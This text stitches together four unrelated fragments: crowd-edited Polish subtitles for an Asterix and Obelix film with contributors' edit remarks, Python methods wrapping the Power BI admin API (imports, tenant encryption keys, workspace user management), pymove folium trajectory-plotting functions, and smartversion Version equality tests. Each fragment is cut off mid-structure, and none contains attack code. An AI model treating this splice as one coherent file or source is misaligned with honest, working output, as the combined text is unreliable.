'gSw0DtEss1ITz2XeRKHJ2332ZK9jFio9':
'Powiedziałem tylko, że koniec przerwy',
's3CaMrna9DfEtPLloYLonSZW7vbZzxDL': 'Będzie tego!',
'dMEDmCZuYNLFrbqvQw5YsVkxqqA2llXT': '…Ver más',
'QxYtEpdak9OYbcvj5sh1rfsWNUFk8MzX': 'Przepraszam.',
'HAywdAV9uBxGWtAENfu8Rfn01ZY4Pajg': 'Tak?',
'g1AuKaseYIUQbL8T66bi17v5GjLMO8Ri': 'Będzie tego!',
'8RtO9VWH6ZJnGZ0kjOkZrOrzEcVXvrNc': '…Ver más',
'iF9F3zUQPg6qhryVZkRJaQWPeAA8fTPa':
'*piszczacy głos* będzie tego. bedzie tego',
'IM8P6VliTnGr7Wjo3v2EsyUHcNCImK4W': 'Wow wow',
'AVf3cOIZmLAaNPDLvk76DBNXJsCUCrtR':
'Kto tu rządzi? Proszę mi tu kogoś wyznaczyć do rozmowy!',
'pYHBq1psn1qK9PhgEwGLW6hYu0aLw87A':
'Jeszcze nie! "Nie będziemy więcej pracować, to nie są warunki dla ludzi pracy i w ogóle nie ma mowy"',
'xogwOZKtbo855ZtZDDu6pZL6U5SMSdIi':
'no własnie, to ja w imieniu towarzyszy bede przemaiwac',
'QBo9y48KxFwVD26TIKbSFpNDpBaiIzTU': '- Nazywam się Idea.',
'lqrvkg3bKGFi42qRAbvrXYqwS57rlDBp':
'po pierwsze, pracujemy po 18 godzin dziennie to daje 36 godzin na dwa dni, rządzamy skrócenia do 35',
'UW7jsUR7YxpSA7C9hxJfktvDc06zAXD2':
'35 godzin, to nierealne... Będą straszne opóźnienia...',
'KsElgcNw8bTqlsrMLMPcey2R0JznsmgK':
'nastepnie, ja przepraszam ze przerywam, ale chcemy dostawac conajmniej dwa razy mniej',
'l6rMiu3vy2TlA4z3rpakoHkir6EBh95V': 'Chyba dwa razy więcej?',
'S6CNyJNnqolIgfa9JMo1mbNyBME6JXv7':
'nie, conajmnie dwa razy mniej batów. dostajemy stanowczo za dużo batów. niektorzy towarzyszem maja migrene od tego ciągłego klaskania. wiecie jak to człowieka drażni?',
'xPeWA9vnLmx5gPUuH5dXjMYoLLQYY08Z':
'No właśnie, a przy okazji jeśli chodzi o obiad, nie możnaby dodać do soczewicy dzika, albo dwóch chociaż... Nie?',
'N0Nesu0ftWSWtFAmfTDR89B1tMrDnvEf': 'Obelix...',
'9mGpYVotgYx9AP9fRF0zZth0LpInldzf':
'nie nie nie jeśli zmniejsze ilość batów będziecie się obijać i wtedy ja ekspresem do krokodyli...',
'n2XXhtcgPTvVQpeip2tY2UfyD0Ry8FD3':
'Wystarczy Numernabisie! Idea ma rację, czas na nowy program taryfowy.',
'sAoO7yv9fvXo9dCYiWbd7cdk89JvY74g':
'Dzik albo dwa do soczewicy i wszystko się ułoży...',
'nTYZem19nIys1MREVILlAokC4oP0Rutn': '-Gotowe!',
'jEeSxECCLXq9kXggavb2E1TRccDDPP22':
'- Nie Obelixie, jak byłeś mały wpadłeś do kotła i wystarczy!',
'GBDszfjHUHe3SJR2AcLj0ftcoxEiOcCQ': 'pokaż im o co w tym chodzi Asterixie',
'FnUOH87v7i7k3GcetFbXsr6MWvO6qNH6': 'Ostrożnie, mogłem trochę przesadzić',
'IvLX0x8fwDelg6ZSPld5kloCpUCh5k22': 'O faktycznie, trochę pali',
'qASObmJf0t7NNic7Fp6T5pURgD41dF21': '<NAME> dilit dis plis :P',
'FrCOkvQ0Cd7VyOQsOy4397R4D6UEpxM9': 'Trochę przesadziłem',
'JNFmzU578g1NnpAInZBnsjAihWxEXLFl': 'No, trochę pali',
'XLIo3fWwWEJ5pxQIaWsJhkmYqmgOjTnQ':
'Noo, idefix zrób stójkę, hm. Zrób stójkę.',
'CT9VSxN9EbeeX3BeNs24PhaX8sYSKLcO': 'Ah tak, tak, wiem.',
'D12qccqf8mBvGcCEiSHT8bggowBMieyr': 'Woah!',
'igRr799rfa4Bt1jIJK4QbL0dPHW2V1pr': 'Obelix!',
'VGchRXKdO4xEk63q52zCRKsZlNo4ieZm': 'Mhhh ?',
'E81AWvgqnNblxrRWkpSycB05TzsG2qk7': 'Siad',
'cU1vqdzR245V0AkU6mT5lUb3PstpnpDG': 'No to ja juz nie mam pytań',
'9vkoIrTaG1YnBB672Pp2OYy92F7Egy8h': 'Nie Obelixie, jak',
'X1NPh61fJq9qK5G8CP0S1Mef82qLckhi': 'Usuun',
'5JBKmaCXlHuswo64R7pZQJqHl69eSdhD':
'Nie bo teraz przed ideą był obelix jeszcze raz',
'uJ4b8MfQghy5PACOunsAA4Hv73I1sKV2':
'A-a-a a jak nie wystarczy dla wszystkich?',
'YqFWDM1ZCcoylDz6GmseFO96DbzfeaEZ': 'To zrobię więcej.',
'JTgkDdMNuYQdbn9l9TCtcwhnZ64OLV9I': 'Nie Obelixie, jak byłeś mały-',
'TNO7QI9KHCgVc4AbAUXrwiZvzxLkn5Aw':
'To wpadłem do kotła, dobra, bez łaski.',
'2zn1yxZUH0CqeTCltKZ5dH6e7EEgoAfu': '*siorb* Aaaha!',
'BLyGIkT4aAclrVDjebgIK8nw39syfjYn': 'pokaż im na czym to polega asterixie',
'CGMPLY7iP9aXPESt52jVaHdBwAjn3wq9': 'usuń, już było',
'bUaPcpr8996ODLFOlFacNaQcH62THlx3': 'Kacper Okarma usuuuń :P',
'Jzu3vABsktu4SiTofTyv3ujiqV7OaT2j': 'Woah! I feel good...',
'1y5dOe6sFAdof8okbpgBhymEaChHs1XV': 'I knew that I would,',
'lj0BiFDkPDeDldVdMQz0d1siNG3IsVW7':
'I feel good, I knew that I would, now',
'6ezwkRuthhg7yPgMc6N4Rscu5RVG3FTV': 'So good! So good! I got you',
'7QQoa7lDQTz9FBmj9OEZL2YBwbvLmrqb':
'Whoa! I feel nice, like sugar and spice',
'NkIR7fPwifYPQDtwIo6K4QXhVLUOG7m1':
'I feeeeel nice! Like sugar and spice~',
'ZSqnKq5wnuFBpCrODVGIS2p4vZCOdai0': 'So nice, so nice, I got you',
'7351hIRJoqkRnxsR36YmcOTS19JIvLGc':
'Ej Mateusz psujesz trochę xD Tutaj była jeszcze wstawka "nie, Obeliksie, nie!" . Zedytuj plz.',
'xvZjfIjPJUW6Q9fILo5VCajHXqMsdYGJ': 'Woooooah! I feel good~!',
'UohEIlXeF7DfdheMo8Xs8bBUG3BuX1C5': 'I knew that I would, now',
'j9dhUR2AETDgANIhwQ7MbPnkJ9lDl4Js': 'Tego chyba nie mówili :|',
'Pkr9jEaffGIysxK9aAPOr5jA0ioNS1X7': 'I feel good! I knew that I would,',
'6V1jeAadHp5vE6Jhg0tcJiBQegIs4UwH': 'So good! So good! I got you',
'nSCPivLmrmGxjooW53PD2llBkSFCGPAv':
'Koooomis! Koooomis! Koooomis! Koooomis!',
'seg9mBGddfjIJPVvIRF3kAdm9R0D5H5N':
'Cała zabawa polega na tym, żeby nie przyśpieszać pisząc po kilka linijek stary :v',
'kpPireBZyuF27Dn7EBdSp484XIIZZdt1':
'Ta piosenka trwała za długo, już nie wytrzymałem ;d',
'B05yl2HqdVXF4WaY1dLPoCASZznMtlmP': 'Komis. To na jego cześć.',
'5hhAqlwDFML1Ajd3Xrt2QjSOns8R1Trr': 'Gumiś?',
'8VfGuvH25f1BeW1FpB6AHjjKRQdweEg9':
'Nieee, Komis. To jest patron sklepikarzy.',
'z8iVd594cMmzrvD1jbq06EoEvPitj1zr': 'So good! So good! I got you',
'MJrBRp5496VR7wXhQOQD8an43bhW7TUX': 'Heyyyy!',
'waun2ZoxnVMm0sr2Bgn6E003X0TVQNFZ': 'oo, Nikosis !',
'3IzeNlnRkSdYPDvetLErDYDmnZQWBaum': 'Co dla pana?',
'rp1imaCLiqYIDSL0cZe2hxtc81RkFxq3': '-Poproszę Imhoteba...',
'yfyZYHF0C924JmMdTSA081e0v5oWEiJd':
'- Chciałbym żebyś rozwiązał za mnie pewien problem.',
'eln9idwax7edNM2KibjQe91SPlyG8gLC': 'Nie ma sprawy szefie...kogo zabić?',
'L00Tmyva3F9Ip1ZJLvKPtAMtAKdujBJ3':
'Nie, nie, nie. Nikogo. Nie będziemy zabijać.',
'LBMpuHBTEuufy0A206c9UKe92kxBYxh7': 'Imhoteby dla panów',
'Ga5mYcr4Fwx7EaTlisQgYiAtG7d3WRt2': 'Trzeba opóźnić transport kamieni',
'1nX8EapYM3ZcHl37x4qq2siC2g9gNDrh': 'Bo bez kamieni nie ma budulca.',
'lkgRS4VnprsVTYexMXFUL3rBJIxL60qu': 'A bez budulca nie ma pałacu',
'GYU7NyW87eRzApBtackCREmOLYFEwO91': 'A bez pałacu....nie ma pałacu.',
'EEF1Fun88CjCCetIl3NyGqpeGewPWt3l': 'Masz. To na pokrycie kosztów',
'dZ7KKEM4ueYN60gwUXJU6OJljhAQUDgk': 'Jak cos zostanie to mi oddasz?',
'cITYNMIvC4wNOgZqtpazr6cGUHL0CSkQ': 'Erijepepedeke!',
'kyR2m1QMdhf0Hxnu3hkB1vAcL88UA60E': 'Spoko kiecka, uh?',
'XX2znvYid4xOL3VFRkr8XUv9oObC4uQa':
'Przybyłem, zobaczyłem, zwyciężyłem, veni vidi vici, wyryj formułki grzecznościowe i podpisz.. Sizar',
'2g9Bn8hzac3Qog7grxNQYPJ9xp9ZSmfK': 'Si zar? Czy Cezar?',
'MvsbmVB9YLiBsDUfZhbJMrR7MTyC5FH5':
'No niech będzie i cezar. Ładniej mi to brzmi, ale wiesz, ustawa o ochronie języka.',
'ne6cbVgkDj2k3SwQm4FDI1cqn8j13peD': | |
ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_imports(self, expand=None, filter=None, skip=None, top=None):
"""Returns a list of imports for the organization.
### Parameters
----
expand: string
Expands related entities inline, receives a comma-separated list of data types. Supported: users, reports, imports, datasets, dataflows, workbooks
filter: string
Filters the results based on a boolean condition
skip: int
Skips the first n results. Use with top to fetch results beyond the first 5000.
top: int
Returns only the first n results. This parameter is mandatory and must be in the range of 1-5000.
### Returns
----
Dict:
A dictionary containing all the imports in the tenant.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/admin/imports?"
if expand != None:
url = url + "$expand={}".format(expand)
if filter != None:
url = url + "&$filter={}".format(filter)
if top != None:
url = url + "&$top={}".format(top)
if skip != None:
url = url + "&$skip={}".format(skip)
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_refreshables(self, expand=None, filter=None, skip=None, top=None):
"""Returns a list of refreshables for the organization.
### Parameters
----
top: int
Returns only the first n results. This parameter is mandatory and must be in the range of 1-5000.
expand: string
Expands related entities inline, receives a comma-separated list of data types. Supported: users, reports, refreshables, datasets, dataflows, workbooks
filter: string
Filters the results based on a boolean condition
skip: int
Skips the first n results. Use with top to fetch results beyond the first 5000.
### Returns
----
Dict:
A dictionary containing all the refreshables in the tenant.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/admin/refreshables?$top={}".format(top)
if expand != None:
url = url + "&$expand={}".format(expand)
if filter != None:
url = url + "&$filter={}".format(filter)
if skip != None:
url = url + "&$skip={}".format(skip)
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_encryption_keys(self, expand=None, filter=None, skip=None, top=None):
"""Returns the encryption keys for the tenant.
### Parameters
----
### Returns
----
Dict:
A dictionary containing all the refreshables in the tenant.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/admin/tenantKeys"
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def add_encryption_key_preview(self, activate, isDefault, keyVaultKeyIdentifier, name):
"""Adds an encryption key for Power BI workspaces assigned to a capacity.
*** THIS REQUEST IS IN PREVIEW IN SIMPLEPBI ***
### Parameters
----
### Request Body
----
All the keys are requested for the body
activate: bool
Indicates to activate any inactivated capacities to use this key for its encryption.
isDefault: bool
Whether an encryption key is the default key for the entire tenant. Any newly created capacity inherits the default key.
keyVaultKeyIdentifier: str
The URI that uniquely specifies an encryption key in Azure Key Vault.
name:
The name of the encryption key
### Returns
----
Response object from requests library. 200 OK
"""
try:
url= "https://api.powerbi.com/v1.0/myorg/admin/tenantKeys"
body = {
"activate": activate,
"isDefault": isDefault,
"keyVaultKeyIdentifier":keyVaultKeyIdentifier,
"name":name
}
headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
res = requests.post(url, data = json.dumps(body), headers = headers)
res.raise_for_status()
return res
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def rotate_encryption_key_preview(self, tenantKeyId, keyVaultKeyIdentifier):
"""Adds an encryption key for Power BI workspaces assigned to a capacity.
*** THIS REQUEST IS IN PREVIEW IN SIMPLEPBI ***
### Parameters
----
tenantKeyId: str uuid
The tenant key ID
### Request Body
----
keyVaultKeyIdentifier: str
The URI that uniquely specifies an encryption key in Azure Key Vault.
### Returns
----
Response object from requests library. 200 OK
"""
try:
url= "https://api.powerbi.com/v1.0/myorg/admin/tenantKeys/{}/Default.Rotate".format(tenantKeyId)
body = {
"keyVaultKeyIdentifier":keyVaultKeyIdentifier
}
headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
res = requests.post(url, data = json.dumps(body), headers = headers)
res.raise_for_status()
return res
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def add_user_to_group(self, workspace_id, groupUserAccessRight, emailAddress, displayName=None, graphId=None, identifier=None, principalType=None):
"""Grants user permissions to the specified workspace.
This API call only supports updating workspaces in the new workspace experience and adding a user principle.
### Parameters
----
workspace_id:
The Power Bi workspace id. You can take it from PBI Service URL
### Request Body
----
groupUserAccessRight: GroupUserAccessRight
Access rights user has for the workspace (Permission level: Admin, Contributor, Member, Viewer or None). This is mandatory
emailAddress: str
Email address of the user. This is mandatory.
displayName: str
Display name of the principal
graphId: str
Identifier of the principal in Microsoft Graph. Only available for admin APIs
identifier: str
Object ID of the principal
principalType: principalType
The principal type (App, Group, User or None)
### Returns
----
Response object from requests library. 200 OK
"""
try:
url= "https://api.powerbi.com/v1.0/myorg/admin/groups/{}/users".format(workspace_id)
body = {
"groupUserAccessRight": groupUserAccessRight,
"emailAddress": emailAddress
}
if displayName != None:
body["diplayName"]=displayName
if graphId != None:
body["graphId"] = graphId
if identifier != None:
body["identifier"] = identifier
if principalType != None:
body["principalType"] = principalType
headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
res = requests.post(url, data = json.dumps(body), headers = headers)
res.raise_for_status()
return res
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def delete_user_from_group(self, workspace_id, user):
"""Removes user permissions from the specified workspace.
This API call only supports updating workspaces in the new workspace experience and adding a user principle.
### Parameters
----
workspace_id: str uuid
The Power Bi workspace id. You can take it from PBI Service URL
user: str
The user principal name (UPN) of the user to remove (usually the user's email).
### Returns
----
Response object from requests library. 200 OK
"""
try:
url= "https://api.powerbi.com/v1.0/myorg/admin/groups/{}/users/{}".format(workspace_id, user)
headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
res = requests.delete(url, headers=headers)
res.raise_for_status()
return res
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def update_group_preview(self, workspace_id, capacityId=None, dashboards=None, dataflowStorageId=None, dataflows=None, datasets=None, description=None, isOnDedicatedCapacity=None, isReadOnly=None, name=None, pipelineId=None, reports=None, state=None, typee=None, users=None, workbooks=None):
"""Updates the properties of the specified workspace.
*** THIS REQUEST IS IN PREVIEW IN SIMPLEPBI ***
This API call call only updates workspaces in the new workspace experience. Only the name and description can be updated. The name must be unique inside an organization.
### Parameters
----
workspace_id:
The Power Bi workspace id. You can take it from PBI Service URL
### Request Body
----
id: string
The workspace ID
capacityId: string
The capacity ID
dashboards: str[]
List of the dashboards ids that belong to the group. Available only for admin API calls.
dataflowStorageId: string
The Power BI dataflow storage account ID
dataflows: str[]
List of the dataflows ids that belong to the group. Available only for admin API calls.
datasets: str[]
List of the datasets ids that belong to the group. Available only for admin API calls.
description: string
The group description. Available only for admin API calls.
isOnDedicatedCapacity: bool
Is the group on dedicated capacity
isReadOnly: bool
Is the group read only
name: string
The group name
pipelineId: string
The deployment pipeline ID that the workspace is assigned to. Available only for workspaces in the new workspace experience and only for admin API calls.
reports: str[]
List of the reports ids that belong to the group. Available only for admin API calls.
state: string
The group state. Available only for admin API calls.
typee: string
The type of group. Available only for admin API calls.
users: GroupUser[]
List of the users that | |
mv = mv_df.reset_index().loc[:n_rows, [LATITUDE, LONGITUDE]]
folium.Marker(
location=[mv.iloc[0][LATITUDE], mv.iloc[0][LONGITUDE]],
color="green",
clustered_marker=True,
popup="Início",
icon=folium.Icon(color="green", icon="info-sign"),
).add_to(base_map)
folium.Marker(
location=[mv.iloc[-1][LATITUDE], mv.iloc[-1][LONGITUDE]],
color="red",
clustered_marker=True,
popup="Fim",
icon=folium.Icon(color="red", icon="info-sign"),
).add_to(base_map)
folium.PolyLine(
mv[[LATITUDE, LONGITUDE]], color=color, weight=2.5, opacity=1
).add_to(base_map)
if save_as_html:
base_map.save(outfile=filename)
else:
return base_map
def plot_trajectory_by_period(
move_data,
period,
id_=None,
legend=True,
n_rows=None,
lat_origin=None,
lon_origin=None,
zoom_start=12,
base_map=None,
tile=TILES[0],
save_as_html=False,
color="black",
filename="plot_trajectory_by_period_with_folium.html",
):
"""
Generate trajectory view by period of day provided by user.
Parameters
----------
move_data : pymove.core.MoveDataFrameAbstract subclass.
Input trajectory data.
period: String
Represents period of day.
id_: int or None
If int, plots trajectory of the user, else plot for all users
legend: boolean
Whether to add a legend to the map
n_rows : int, optional, default None.
Represents number of data rows that are will plot.
lat_origin : float, optional, default None.
Represents the latitude which will be the center of the map.
If not entered, the first data from the dataset is used.
lon_origin : float, optional, default None.
Represents the longitude which will be the center of the map.
If not entered, the first data from the dataset is used.
zoom_start : int, optional, default 12.
Initial zoom level for the map
base_map : folium.folium.Map, optional, default None.
Represents the folium map. If not informed, a new map is generated
using the function create_base_map(), with the lat_origin,
lon_origin and zoom_start.
tile : String, optional, default 'OpenStreetMap'.
Represents the map's tiles.
save_as_html : bool, optional, default False.
Represents if want save this visualization in a new file .html.
color : String or List, optional, default 'black'.
Represents line's color of visualization.
Pass a list if ploting for many users. Else colors will be chosen at random
filename : String, optional, default 'plot_trajectory_by_period.html'.
Represents the file name of new file .html.
Returns
-------
base_map : folium.folium.Map.
Represents a folium map with visualization.
Raises
------
KeyError period not found in dataframe
IndexError if there is no user with the id passed
"""
if base_map is None:
if lat_origin is None and lon_origin is None:
lat_origin = move_data.loc[0][LATITUDE]
lon_origin = move_data.loc[0][LONGITUDE]
base_map = create_base_map(
default_location=[lat_origin, lon_origin],
tile=tile,
default_zoom_start=zoom_start,
)
if PERIOD not in move_data:
move_data.generate_time_of_day_features()
mv_df = move_data[move_data[PERIOD] == period].reset_index()
if not len(mv_df):
raise KeyError(f"No PERIOD found in dataframe")
if n_rows is None:
n_rows = mv_df.shape[0]
if id_ is not None:
mv_df = mv_df[mv_df[TRAJ_ID] == id_].loc[
:n_rows, [LATITUDE, LONGITUDE, TRAJ_ID]
]
if not len(mv_df):
raise IndexError(f"No user with id {id_} in dataframe")
else:
mv_df = mv_df.loc[:n_rows, [LATITUDE, LONGITUDE, TRAJ_ID]]
if id_ is not None:
items = list(zip([id_], [color]))
else:
ids = mv_df[TRAJ_ID].unique()
if isinstance(color, str):
colors = [generate_color() for _ in ids]
else:
colors = color[:]
items = list(zip(ids, colors))
for _id, color in items:
mv = mv_df[mv_df[TRAJ_ID] == _id]
folium.Marker(
location=[mv.iloc[0][LATITUDE], mv.iloc[0][LONGITUDE]],
color="green",
clustered_marker=True,
popup="Início",
icon=folium.Icon(color="green", icon="info-sign"),
).add_to(base_map)
folium.Marker(
location=[mv.iloc[-1][LATITUDE], mv.iloc[-1][LONGITUDE]],
color="red",
clustered_marker=True,
popup="Fim",
icon=folium.Icon(color="red", icon="info-sign"),
).add_to(base_map)
folium.PolyLine(
mv[[LATITUDE, LONGITUDE]], color=color, weight=2.5, opacity=1
).add_to(base_map)
if id_ is None and legend:
add_map_legend(base_map, "Color by user ID", items)
if save_as_html:
base_map.save(outfile=filename)
else:
return base_map
def plot_trajectory_by_day_week(
move_data,
day_week,
id_=None,
legend=True,
n_rows=None,
lat_origin=None,
lon_origin=None,
zoom_start=12,
base_map=None,
tile=TILES[0],
save_as_html=False,
color="black",
filename="plot_trajectory_by_day_week.html",
):
"""
Generate trajectory view by day week provided by user.
Parameters
----------
move_data : pymove.core.MoveDataFrameAbstract subclass.
Input trajectory data.
day_week: String
Represents day week.
id_: int or None
If int, plots trajectory of the user, else plot for all users
legend: boolean
Whether to add a legend to the map
n_rows : int, optional, default None.
Represents number of data rows that are will plot.
lat_origin : float, optional, default None.
Represents the latitude which will be the center of the map.
If not entered, the first data from the dataset is used.
lon_origin : float, optional, default None.
Represents the longitude which will be the center of the map.
If not entered, the first data from the dataset is used.
zoom_start : int, optional, default 12.
Initial zoom level for the map
base_map : folium.folium.Map, optional, default None.
Represents the folium map. If not informed, a new map is generated
using the function create_base_map(), with the lat_origin,
lon_origin and zoom_start.
tile : String, optional, default 'OpenStreetMap'.
Represents the map's tiles.
save_as_html : bool, optional, default False.
Represents if want save this visualization in a new file .html.
color : String or List, optional, default 'black'.
Represents line's color of visualization.
Pass a list if ploting for many users. Else colors will be chosen at random
filename : String, optional, default 'plot_trajectory_by_day_week.html'.
Represents the file name of new file .html.
Returns
-------
base_map : folium.folium.Map.
Represents a folium map with visualization.
Raises
------
KeyError day_week not found in dataframe
IndexError if there is no user with the id passed
"""
if base_map is None:
if lat_origin is None and lon_origin is None:
lat_origin = move_data.loc[0][LATITUDE]
lon_origin = move_data.loc[0][LONGITUDE]
base_map = create_base_map(
default_location=[lat_origin, lon_origin],
tile=tile,
default_zoom_start=zoom_start,
)
if DAY not in move_data:
move_data.generate_day_of_the_week_features()
mv_df = move_data[move_data[DAY] == day_week].reset_index()
if not len(mv_df):
raise KeyError(f"No DAY found in dataframe")
if n_rows is None:
n_rows = mv_df.shape[0]
if id_ is not None:
mv_df = mv_df[mv_df[TRAJ_ID] == id_].loc[
:n_rows, [LATITUDE, LONGITUDE, TRAJ_ID]
]
if not len(mv_df):
raise IndexError(f"No user with id {id_} in dataframe")
else:
mv_df = mv_df.loc[:n_rows, [LATITUDE, LONGITUDE, TRAJ_ID]]
if id_ is not None:
items = list(zip([id_], [color]))
else:
ids = mv_df[TRAJ_ID].unique()
if isinstance(color, str):
colors = [generate_color() for _ in ids]
else:
colors = color[:]
items = list(zip(ids, colors))
for _id, color in items:
mv = mv_df[mv_df[TRAJ_ID] == _id]
folium.Marker(
location=[mv.iloc[0][LATITUDE], mv.iloc[0][LONGITUDE]],
color="green",
clustered_marker=True,
popup="Início",
icon=folium.Icon(color="green", icon="info-sign"),
).add_to(base_map)
folium.Marker(
location=[mv.iloc[-1][LATITUDE], mv.iloc[-1][LONGITUDE]],
color="red",
clustered_marker=True,
popup="Fim",
icon=folium.Icon(color="red", icon="info-sign"),
).add_to(base_map)
folium.PolyLine(
mv[[LATITUDE, LONGITUDE]], color=color, weight=2.5, opacity=1
).add_to(base_map)
if id_ is None and legend:
add_map_legend(base_map, "Color by user ID", items)
if save_as_html:
base_map.save(outfile=filename)
else:
return base_map
def plot_trajectory_by_date(
move_data,
start_date,
end_date,
id_=None,
legend=True,
n_rows=None,
lat_origin=None,
lon_origin=None,
zoom_start=12,
base_map=None,
tile=TILES[0],
save_as_html=False,
color="black",
filename="plot_trajectory_by_date.html",
):
"""
Generate trajectory view by period of time provided by user.
Parameters
----------
move_data : pymove.core.MoveDataFrameAbstract subclass.
Input trajectory data.
start_date : String
Represents start date of time period.
end_date : String
Represents end date of time period.
id_: int or None
If int, plots trajectory of the user, else plot for all users
legend: boolean
Whether to add a legend to the map
n_rows : int, optional, default None.
Represents number of data rows that are will plot.
lat_origin : float, optional, default None.
Represents the latitude which will be the center of the map.
If not entered, the first data from the dataset is used.
lon_origin : float, optional, default None.
Represents the longitude which will be the center of the map.
If not entered, the first data from the dataset is used.
zoom_start : int, optional, default 12.
Initial zoom level for the map
base_map : folium.folium.Map, optional, default None.
Represents the folium map. If not informed, a new map is generated
using the function create_base_map(), with the lat_origin,
lon_origin and zoom_start.
tile : String, optional, default 'OpenStreetMap'.
Represents the map's tiles.
save_as_html : bool, optional, default False.
Represents if want save this visualization in a new file .html.
color : String or List, optional, default 'black'.
Represents line's color of visualization.
Pass a list if ploting for many users. Else colors will be chosen at random
filename : String, optional, default 'plot_trejectory_with_folium.html'.
Represents the file name of new file .html.
Returns
-------
base_map : folium.folium.Map.
Represents a folium map with visualization.
Raises
------
KeyError start or end date range not found in dataframe
IndexError if there is no user with the id passed
"""
if base_map is None:
if lat_origin is None and lon_origin is None:
lat_origin = move_data.loc[0][LATITUDE]
lon_origin = move_data.loc[0][LONGITUDE]
base_map = create_base_map(
default_location=[lat_origin, lon_origin],
tile=tile,
default_zoom_start=zoom_start,
)
if isinstance(start_date, str):
start_date = str_to_datetime(start_date).date()
if isinstance(end_date, str):
end_date = str_to_datetime(end_date).date()
if DATE not in move_data:
move_data.generate_date_features()
mv_df = move_data[
(move_data[DATE] <= end_date) & (move_data[DATE] >= start_date)
].reset_index()
if not len(mv_df):
raise KeyError(f"No DATE | |
<filename>smartversion/foo.py
def test_usage():
l = []
for i in range(20):
l.append(Version(i, i))
for i in range(20):
assert(l[i] == Version(i, i))
v1 = Version(0)
v2 = Version(0)
assert(v1 == v2)
assert(hash(v1) == hash(v2))
v1 = Version(1, 2, '3-rc6')
v2 = Version(1, 2, 4)
assert(v1 != v2)
assert(hash(v1) != hash(v2))
v2 = Version(1, 2, '3-rc6')
assert(v1 == v2)
assert(hash(v1) == hash(v2))
d = {}
for i in range(20):
v = Version(i, i, i)
d[v] = i
for i in range(20):
v = Version(i, i, i)
assert(d[v] == i)
v1 = Version(0, 1, 2)
v2 = Version(0, 1, 3)
s = set([v1, v2])
assert(len(s) == 2)
v2 = Version(0, 1, 2)
s = set([v1, v2])
assert(len(s) == 1)
def test_compare():
compare = lambda l: l[0] == l[1]
# TODO check both semver and pep404 comparisons (and interactions)
# TODO check semantics where default is wrong
# Equalities
v1 = Version(major=0)
v2 = Version() # Implied 0
assert(v1 == v2)
assert(v2 == v1)
v1 = Version('foo', 1)
v2 = Version('foo', 1)
assert(v1 == v2)
assert(v2 == v1)
v1 = Version('foo', 1)
v2 = Version('foo', 1, 0)
assert(v1 == v2)
assert(v2 == v1)
v1 = Version('foo', 1, 1)
v2 = Version('foo', 1, 1)
assert(v1 == v2)
assert(v2 == v1)
v1 = Version('foo', 1, 1)
v2 = Version('foo', 1, 1, 0)
assert(v1 == v2)
assert(v2 == v1)
v1 = Version('foo', 1, 1, 1)
v2 = Version('foo', 1, 1, 1)
assert(v1 == v2)
assert(v2 == v1)
v1 = Version('foo', 1, 1, '1')
v2 = Version('foo', 1, 1, '1')
assert(v1 == v2)
assert(v2 == v1)
v1 = Version('foo', 1, 1, '1rc')
v2 = Version('foo', 1, 1, '1rc')
assert(v1 == v2)
assert(v2 == v1)
v1 = Version('foo', 1, 1, '1rc1')
v2 = Version('foo', 1, 1, '1rc1')
assert(v1 == v2)
assert(v2 == v1)
v1 = Version('foo', 1, 1, 'rc1')
v2 = Version('foo', 1, 1, 'rc1')
assert(v1 == v2)
assert(v2 == v1)
v1 = Version('foo', 1, 1, 'rc')
v2 = Version('foo', 1, 1, 'rc')
assert(v1 == v2)
assert(v2 == v1)
# extra_str shouldn't affect comparison
v1 = Version('foo', 1, extra_str = 'asd')
v2 = Version('foo', 1, extra_str = 'lkj')
assert(v1 == v2)
assert(v2 == v1)
# nor release_date
v1 = Version('foo', 1, release_date = date(2000, 1, 1))
v2 = Version('foo', 1, release_date = date(2000, 1, 2))
assert(v1 == v2)
assert(v2 == v1)
# nor build_meta
v1 = Version('foo', 1, build_meta = 'lkasdjf')
v2 = Version('foo', 1, build_meta = ';KFJDAa')
assert(v1 == v2)
assert(v2 == v1)
# Inequalities
v1 = Version(major=0)
v2 = Version(major=1)
assert(v1 != v2)
assert(v2 != v1)
v1 = Version(major=0, minor=0)
v2 = Version(major=0, minor=1)
assert(v1 != v2)
assert(v2 != v1)
v1 = Version(major=0, minor=0, patch=0)
v2 = Version(major=0, minor=0, patch=1)
assert(v1 != v2)
assert(v2 != v1)
v1 = Version('foo', have_clue=True)
v2 = Version('bar', have_clue=True)
#assert(v1 != v2)
#assert(v2 != v1)
v1 = Version('foo', 1)
v2 = Version('foo', 2)
assert(v1 != v2)
assert(v2 != v1)
v1 = Version('foo', 1, 1)
v2 = Version('foo', 1, 2)
assert(v1 != v2)
assert(v2 != v1)
